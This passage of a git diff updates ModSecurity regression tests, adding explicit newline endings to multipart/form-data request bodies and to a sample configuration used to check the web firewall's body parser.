"----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1864,25 +1864,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1919,25 +1919,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ diff --git a/test/test-cases/regression/operator-fuzzyhash.json b/test/test-cases/regression/operator-fuzzyhash.json index 2250ebe2d4..56e4b505cd 100644 --- a/test/test-cases/regression/operator-fuzzyhash.json +++ b/test/test-cases/regression/operator-fuzzyhash.json @@ -23,68 +23,68 @@ "uri":"/", "method":"POST", "body": [ -"", -"# -- Rule engine initialization ----------------------------------------------", -"", -"# Enable ModSecurity, attaching it to every transaction. Use detection", -"# only to start with, because that minimises the chances of post-installation", -"# disruption.", -"#", -"SecRuleEngine DetectionOnly", -"", -"", -"# -- Request body handling ---------------------------------------------------", -"", -"# Allow ModSecurity to access request bodies. If you don't, ModSecurity", -"# won't be able to see any POST parameters, which opens a large security", -"# hole for attackers to exploit.", -"#", -"SecRequestBodyAccess On", -"", -"", -"# Enable XML request body parser.", -"# Initiate XML Processor in case of xml content-type", -"#", -"SecRule REQUEST_HEADERS:Content-Type \"text/xml\" \\", -" \"id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML\"", -"", -"# Enable JSON request body parser.", -"# Initiate JSON Processor in case of JSON content-type; change accordingly", -"# if your application does not use 'application/json'", -"#", -"SecRule REQUEST_HEADERS:Content-Type \"application/json\" \\", -" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", -"", -"# Maximum request body size we will accept for buffering. If you support", -"# file uploads then the value given on the first line has to be as large", -"# as the largest file you are willing to accept. The second value refers", -"# to the size of data, with files excluded. You want to keep that value as", -"# low as practical.", -"#", -"SecRequestBodyLimit 13107200", -"SecRequestBodyNoFilesLimit 131072", -"", -"# Store up to 128 KB of request body data in memory. When the multipart", -"# parser reachers this limit, it will start using your hard disk for", -"# storage. That is slow, but unavoidable.", -"#", -"SecRequestBodyInMemoryLimit 131072", -"", -"# What do do if the request body size is above our configured limit.", -"# Keep in mind that this setting will automatically be set to ProcessPartial", -"# when SecRuleEngine is set to DetectionOnly mode in order to minimize", -"# disruptions when initially deploying ModSecurity.", -"#", -"SecRequestBodyLimitAction Reject", -"", -"# Verify that we've correctly processed the request body.", -"# As a rule of thumb, when failing to process a request body", -"# you should reject the request (when deployed in blocking mode)", -"# or log a high-severity alert (when deployed in detection-only mode).", -"#", -"SecRule REQBODY_ERROR \"!\\@eq 0\" ", -"\"id:'200002', phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2\"", -" " +"\n", +"# -- Rule engine initialization ----------------------------------------------\n", +"\n", +"# Enable ModSecurity, attaching it to every transaction. Use detection\n", +"# only to start with, because that minimises the chances of post-installation\n", +"# disruption.\n", +"#\n", +"SecRuleEngine DetectionOnly\n", +"\n", +"\n", +"# -- Request body handling ---------------------------------------------------\n", +"\n", +"# Allow ModSecurity to access request bodies. If you don't, ModSecurity\n", +"# won't be able to see any POST parameters, which opens a large security\n", +"# hole for attackers to exploit.\n", +"#\n", +"SecRequestBodyAccess On\n", +"\n", +"\n", +"# Enable XML request body parser.\n", +"# Initiate XML Processor in case of xml content-type\n", +"#\n", +"SecRule REQUEST_HEADERS:Content-Type \"text/xml\" \\\n", +" \"id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML\"\n", +"\n", +"# Enable JSON request body parser.\n", +"# Initiate JSON Processor in case of JSON content-type; change accordingly\n", +"# if your application does not use 'application/json'\n", +"#\n", +"SecRule REQUEST_HEADERS:Content-Type \"application/json\" \\\n", +" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"\n", +"\n", +"# Maximum request body size we will accept for buffering. If you support\n", +"# file uploads then the value given on the first line has to be as large\n", +"# as the largest file you are willing to accept. The second value refers\n", +"# to the size of data, with files excluded. You want to keep that value as\n", +"# low as practical.\n", +"#\n", +"SecRequestBodyLimit 13107200\n", +"SecRequestBodyNoFilesLimit 131072\n", +"\n", +"# Store up to 128 KB of request body data in memory. When the multipart\n", +"# parser reachers this limit, it will start using your hard disk for\n", +"# storage. That is slow, but unavoidable.\n", +"#\n", +"SecRequestBodyInMemoryLimit 131072\n", +"\n", +"# What do do if the request body size is above our configured limit.\n", +"# Keep in mind that this setting will automatically be set to ProcessPartial\n", +"# when SecRuleEngine is set to DetectionOnly mode in order to minimize\n", +"# disruptions when initially deploying ModSecurity.\n", +"#\n", +"SecRequestBodyLimitAction Reject\n", +"\n", +"# Verify that we've correctly processed the request body.\n", +"# As a rule of thumb, when failing to process a request body\n", +"# you should reject the request (when deployed in blocking mode)\n", +"# or log a high-severity alert (when deployed in detection-only mode).\n", +"#\n", +"SecRule REQBODY_ERROR \"!\\@eq 0\" \n", +"\"id:'200002', phase:2,t:none,log,deny,status:400,msg:'Failed to parse request body.',logdata:'%{reqbody_error_msg}',severity:2\"\n", +" \n" ] }, "response":{ diff --git a/test/test-cases/regression/request-body-parser-multipart-crlf.json b/test/test-cases/regression/request-body-parser-multipart-crlf.json index 8d49c79606..2e4c001f7d 100644 --- a/test/test-cases/regression/request-body-parser-multipart-crlf.json +++ b/test/test-cases/regression/request-body-parser-multipart-crlf.json @@ -24,21 +24,21 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "1.1\r", - "1.2\r", - "1.3\r", - "-----------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=\"b\"\r", - "\r", - "2\r", - "2.1\r", - "2.2\r", - "2.3\r", - "-----------------------------69343412719991675451336310646--" + "-----------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "1.1\r\n", + "1.2\r\n", + "1.3\r\n", + "-----------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "2.1\r\n", + "2.2\r\n", + "2.3\r\n", + "-----------------------------69343412719991675451336310646--\n" ] }, "response":{ diff --git a/test/test-cases/regression/request-body-parser-multipart.json b/test/test-cases/regression/request-body-parser-multipart.json index 4e25168e36..1c5586fcf7 100644 --- a/test/test-cases/regression/request-body-parser-multipart.json +++ b/test/test-cases/regression/request-body-parser-multipart.json @@ -23,20 +23,20 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA\r\n", + "--0000--\r\n" ] }, "response":{ @@ -84,15 +84,15 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -119,7 +119,7 @@ { "enabled":1, "version_min":300000, - "title":"multipart parser (no final CRLF) - FIXME: test suit cannot work without the ending \\n", + "title":"multipart parser (no final CRLF)", "client":{ "ip":"200.249.12.31", "port":123 @@ -140,15 +140,15 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--" ] }, "response":{ @@ -196,15 +196,15 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------------------------------boundary\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "--------------------------------------------------boundary\r", - "Content-Disposition: form-data; name=\"b\"\r", - "\r", - "2\r", - "--------------------------------------------------boundary--\r" + "--------------------------------------------------boundary\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "--------------------------------------------------boundary\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "--------------------------------------------------boundary--\r\n" ] }, "response":{ @@ -252,15 +252,15 @@ "uri":"/", "method":"POST", "body":[ - "----------0xKhTmLbOuNdArY\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "----------0xKhTmLbOuNdArY\r", - "Content-Disposition: form-data; name=\"b\"\r", - "\r", - "2\r", - "----------0xKhTmLbOuNdArY--\r" + "----------0xKhTmLbOuNdArY\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "----------0xKhTmLbOuNdArY\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "----------0xKhTmLbOuNdArY--\r\n" ] }, "response":{ @@ -308,16 +308,15 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "--test\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"b\"\r", - "\r", - "--\r", - "-----------------------------69343412719991675451336310646--\r" - + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "--test\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "--\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -364,14 +363,14 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"b\"\r", - "\r", - "2\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n" ] }, "response":{ @@ -417,13 +416,13 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -469,15 +468,15 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data name=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -523,15 +522,15 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data;\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data;\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -577,17 +576,17 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - ":\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + ":\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -633,17 +632,17 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data;\r", - " name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data;\r", - " name=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -691,17 +690,17 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data;\r", - " name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data;\r", - " name=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -749,16 +748,16 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data;\r", - " name=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -806,16 +805,16 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data;\r", - "\fname=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + "\fname=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -863,16 +862,16 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data;\r", - "\f\tname=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + "\f\tname=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -920,16 +919,16 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646--\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"b\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646--\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -975,16 +974,15 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=\"a\"\r", - "\r", - "1\r", - "-----------------------------69343412719991675451336310646\r", - "Content-Disposition: form-data; name=';filename=\"dummy';name=b;\"\r", - "\r", - "2\r", - "-----------------------------69343412719991675451336310646--\r" - + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=';filename=\"dummy';name=b;\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" ] }, "response":{ @@ -1578,20 +1576,20 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA\r\n", + "--0000--\r\n" ] }, "response":{ @@ -1618,7 +1616,7 @@ { "enabled":1, "version_min":300000, - "title":"multipart parser (boundary special char - trailing exclamation+token)", + "title":"multipart parser (boundary special char - trailing exclamation+token)", "client":{ "ip":"200.249.12.31", "port":123 @@ -1633,7 +1631,7 @@ "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", - "Content-Type":"multipart/form-data;boundary=0000!1111", + "Content-Type":"multipart/form-data;boundary=0000!1111", "Expect":"100-continue" }, "uri":"/", @@ -1850,7 +1848,7 @@ }, "expected":{ "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." + "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." }, "rules":[ "SecRuleEngine On", @@ -1911,7 +1909,7 @@ }, "expected":{ "http_code": 403, - "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." + "debug_log": "Invalid boundary in C-T \\(characters\\).*boundary was quoted." }, "rules":[ "SecRuleEngine On", @@ -2249,30 +2247,30 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: attachment\r", - "Content-Type: multipart/mixed; boundary=BbC04y\r", - "\r", - "--BbC04y\r", - "Content-Disposition: file; filename=\"file1.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "... contents of file1.txt ...\r", - "--BbC04y\r", - "Content-Disposition: file; filename=\"file2.gif\r", - "Content-Type: image/jpeg\r", - "Content-Transfer-Encoding: binary\r", - "\r", - "...contents of file2.gif...\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Disposition: attachment\r\n", + "Content-Type: multipart/mixed; boundary=BbC04y\r\n", + "\r\n", + "--BbC04y\r\n", + "Content-Disposition: file; filename=\"file1.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "... contents of file1.txt ...\r\n", + "--BbC04y\r\n", + "Content-Disposition: file; filename=\"file2.gif\r\n", + "Content-Type: image/jpeg\r\n", + "Content-Transfer-Encoding: binary\r\n", + "\r\n", + "...contents of file2.gif...\r\n", + "--0000--\r\n" ] }, "response":{ @@ -2320,29 +2318,29 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Type: multipart/mixed; boundary=BbC04y\r", - "\r", - "--BbC04y\r", - "Content-Disposition: file; filename=\"file1.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "... contents of file1.txt ...\r", - "--BbC04y\r", - "Content-Disposition: file; filename=\"file2.gif\r", - "Content-Type: image/jpeg\r", - "Content-Transfer-Encoding: binary\r", - "\r", - "...contents of file2.gif...\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Type: multipart/mixed; boundary=BbC04y\r\n", + "\r\n", + "--BbC04y\r\n", + "Content-Disposition: file; filename=\"file1.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "... contents of file1.txt ...\r\n", + "--BbC04y\r\n", + "Content-Disposition: file; filename=\"file2.gif\r\n", + "Content-Type: image/jpeg\r\n", + "Content-Transfer-Encoding: binary\r\n", + "\r\n", + "...contents of file2.gif...\r\n", + "--0000--\r\n" ] }, "response":{ @@ -2390,34 +2388,34 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "Brian Rectanus\r", - "--0000\r", - "Content-Disposition: form-data; name=\"email\"\r", - "\r", - "brian.rectanus@breach.com\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image1\"; filename=\"image1.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA1\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image2\"; filename=\"image2.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA2\r", - "--0000\r", - "Content-Disposition: form-data; name=\"image3\"; filename=\"image3.jpg\"\r", - "Content-Type: image/jpeg\r", - "\r", - "BINARYDATA3\r", - "--0000\r", - "Content-Disposition: form-data; name=\"test\"\r", - "\r", - "This is test data.\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "Brian Rectanus\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"email\"\r\n", + "\r\n", + "brian.rectanus@breach.com\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image1\"; filename=\"image1.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA1\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image2\"; filename=\"image2.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA2\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"image3\"; filename=\"image3.jpg\"\r\n", + "Content-Type: image/jpeg\r\n", + "\r\n", + "BINARYDATA3\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"test\"\r\n", + "\r\n", + "This is test data.\r\n", + "--0000--\r\n" ] }, "response":{ @@ -2537,26 +2535,26 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_token\"\r", - "\r", - "9e433de44c9e9b4ce19603269aa34edb\r", - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332273--\r" + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_token\"\r\n", + "\r\n", + "9e433de44c9e9b4ce19603269aa34edb\r\n", + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + 